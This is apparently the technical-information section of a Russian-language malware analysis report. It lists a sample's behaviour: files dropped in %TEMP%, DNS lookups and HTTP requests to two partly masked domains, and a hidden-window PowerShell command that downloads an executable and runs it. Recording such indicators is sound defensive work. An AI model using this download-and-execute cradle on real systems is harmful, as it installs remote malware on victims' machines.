Техническая информация
- $wlmdprk как %temp%\szlywfu.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1920
- %TEMP%\rguuyhmbc.bat
- %TEMP%\1076094.cvr
- 'zi##mbd.com':80
- 'io####nsulting.com':80
- http://zi##mbd.com/jas.bin
- http://io####nsulting.com/jas.bin
- DNS ASK zi##mbd.com
- DNS ASK io####nsulting.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "